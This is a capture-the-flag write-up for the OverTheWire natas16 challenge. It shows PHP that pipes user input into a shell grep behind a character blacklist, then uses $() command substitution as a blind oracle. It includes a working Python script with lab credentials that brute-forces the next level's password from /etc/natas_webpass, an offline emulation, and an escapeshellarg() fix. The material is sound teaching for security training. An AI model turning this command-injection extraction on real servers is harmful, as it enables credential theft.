Challenge:
For security reasons, we now filter even more on certain characters.

Here we see the input field again, used to search for words containing a given string:

Solving it:
So let's have a look at the source code:

<html>
<body>
<h1>natas16</h1>
<div id="content">

For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

As we can see, the characters ; | & ` ' " are being filtered. The backslash is not part of the filter: inside the single-quoted PHP regex '/[;|&`\'"]/' the sequence \' is simply PHP's way of writing a literal single quote. The same goes for the \" around $key in the passthru() call: inside a double-quoted PHP string it produces a plain double quote, so the command that actually reaches the shell is grep -i "<our input>" dictionary.txt, with our input sitting inside bash double quotes. (In bash itself a backslash works the same way: \X escapes the character X so that it is taken literally, equivalent to 'X', and \ may be used to quote " and ' so they are expressed literally.)

We cannot break out of these quotes with quotes of our own, since both ' and " are filtered. Bash does, however, still perform command substitution inside double quotes: writing $(date) in the needle runs date and splices its output into the grep pattern. The catch is that we never see that output directly; it only becomes part of what the outer grep searches for. So $(cat /etc/natas_webpass/natas17)test does not print the password: the pattern becomes "<password>test", which matches nothing in dictionary.txt. What we do get is an oracle. When the inner command prints nothing (a file name that does not exist, or a grep with no match), the pattern is just "test" and the page lists the dictionary words containing it. So we can tell whether the inner command produced output, even though we cannot read the output itself.

Knowing this, we can reuse the script from the previous exercise and brute-force the password character by character, this time with grep instead of a SQL injection. But before editing the Python script, let's first check that grep can read the file in /etc and that a pattern works. With $(grep -i b /etc/natas_webpass/natas17)test, searching for a character that occurs in the password (a or b) gives no output, because the password line ends up in front of "test". Searching for something that certainly is not in there, like aaaaaaa, makes the inner grep print nothing, so the search for "test" runs normally. The oracle works, so let's edit the Python script. I came up with the following:
PS: to have as little output as possible to look for, I used the word "abstractest", which only returns one line, just to make sure the script does not trip over other matches. If it works I'll test it with "test". The script is as follows:

import string
import requests

characters = string.ascii_letters + string.digits
url = "http://natas16.natas.labs.overthewire.org/"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
password = ""
passlength = 32
exists_str = "abstractest"   # shows up in the output only when the inner grep printed nothing

# extend the known prefix one character at a time until the password is 32 characters long
while len(password) != passlength:
    for char in characters:
        # $(...) is still expanded inside the double quotes of grep -i "$key".
        # If ^prefix matches, the password line lands in front of "abstractest"
        # in the outer pattern and the word is no longer found in dictionary.txt.
        payload = '$(grep ^' + password + char + ' /etc/natas_webpass/natas17)' + exists_str
        r = requests.get(url, params={'needle': payload, 'submit': 'Search'},
                         auth=(auth_username, auth_password))
        if exists_str not in r.text:
            password += char
            print("Password: {0}".format(password))
            break   # prefix grew, start the next position from the first character

print("Final password: " + password)

So we changed the URL and of course the credentials used to authenticate. We also had to change the request, because we are attacking through command substitution in the needle parameter and not through a SQL injection. Lastly we had to flip the if statement: a character is correct when the word "abstractest" did NOT show up. After running this script we received the password:

There were some hiccups: at first I did not receive the correct password. A plain grep (or grep -i) matches the guessed prefix anywhere in the line, and with -i in either case, so characters that merely occur somewhere in the password were accepted as well. Anchoring the pattern with ^ makes the inner grep match only at the start of the line, so a character is accepted only when it really extends the prefix found so far.
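To make the oracle and the need for the ^ anchor concrete, here is an added, offline model of the natas16 endpoint and the blind extraction against it. This is example code written for this writeup, not the challenge's own code: the secret, the dictionary words and the file contents are constructed, the filter regex and the grep -i "..." construct are copied from the PHP above, and a tiny emulation stands in for bash's $( ) expansion and for grep so that everything runs without the server. The unanchored variant reproduces the hiccup with a plain grep.

```python
import re
import string

# Constructed model of the natas16 page: secret, dictionary words and file
# contents are made up for this example; the challenge reads
# /etc/natas_webpass/natas17 and dictionary.txt on the server.
SECRET = "h7vT0pDqXwmR4aZsGnLcJy2kBf9eUiKo"
FILES = {
    "/etc/natas_webpass/natas17": SECRET + "\n",
    "dictionary.txt": "abstract\nabstractest\nalpha\ntest\ntesting\nzebra\n",
}

# Same character class as the PHP filter: preg_match('/[;|&`\'"]/', $key)
ILLEGAL = re.compile(r'[;|&`\'"]')
# The only shell construct this model expands: $(grep [-i] PATTERN FILE)
SUBST = re.compile(r'\$\(grep (-i )?(\S+) ([^\s)]+)\)')


def fake_grep(pattern, text, ignore_case=False):
    """Minimal stand-in for grep: the lines of text that match pattern."""
    flags = re.IGNORECASE if ignore_case else 0
    return [line for line in text.splitlines() if re.search(pattern, line, flags)]


def natas16_search(needle):
    """Emulate the PHP: filter check, then passthru('grep -i "$key" dictionary.txt').

    Bash still expands $(...) inside double quotes, so the inner grep runs and
    its stdout (trailing newline stripped, as bash does) lands in the outer
    pattern. Returns what the page would print.
    """
    if ILLEGAL.search(needle):
        return "Input contains an illegal character!"

    def expand(match):
        ignore_case, pattern, path = match.groups()
        return "\n".join(fake_grep(pattern, FILES.get(path, ""), bool(ignore_case)))

    outer_pattern = SUBST.sub(expand, needle)
    return "\n".join(fake_grep(outer_pattern, FILES["dictionary.txt"], ignore_case=True))


def extract(search, marker="abstractest", length=32, anchored=True):
    """Recover the secret one character at a time through the blind oracle.

    A guess is right when the inner grep prints the password line: the outer
    pattern then becomes '<password><marker>', which matches no dictionary word,
    so the marker disappears from the output. With anchored=False the inner
    pattern has no ^, reproducing the mistake the writeup ran into.
    """
    charset = string.ascii_letters + string.digits
    anchor = "^" if anchored else ""
    recovered = ""
    while len(recovered) < length:
        for c in charset:
            needle = f"$(grep {anchor}{recovered}{c} /etc/natas_webpass/natas17){marker}"
            if marker not in search(needle):
                recovered += c
                break
        else:
            break  # nothing extends the prefix: give up instead of looping forever
    return recovered


if __name__ == "__main__":
    print("anchored:  ", extract(natas16_search))
    print("unanchored:", extract(natas16_search, anchored=False))
```

Running it shows the anchored search recovering the full secret, while the unanchored search latches onto the first character that occurs anywhere in the password and stops on a partial suffix. The server-side lesson is the same as in the real challenge: a blacklist that leaves $( ), ^ and the double quotes' own expansion rules intact is no protection; the needle should go through escapeshellarg() before it is interpolated into the command.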
